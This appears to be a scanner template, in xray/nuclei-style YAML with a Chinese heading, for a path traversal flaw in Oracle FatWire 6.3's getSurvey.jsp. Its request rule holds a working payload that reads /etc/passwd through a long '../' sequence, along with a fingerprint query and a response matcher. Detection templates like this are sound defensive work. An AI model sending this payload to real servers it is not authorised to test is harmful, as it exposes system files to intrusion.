漏洞描述
Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
app="Oracle-FatWire-Content-Server"
id: oracle-fatwire-lfi
info:
name: Oracle Fatwire 6.3 - Path Traversal
author: Bernardo Rodrigues @bernardofsr
severity: high
description: |
Oracle Fatwire 6.3 suffers from a path traversal vulnerability in the getSurvey.jsp endpoint.
app="Oracle-FatWire-Content-Server"
reference:
- https://www.exploit-db.com/exploits/50167
rules:
r0:
request:
method: GET
path: /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()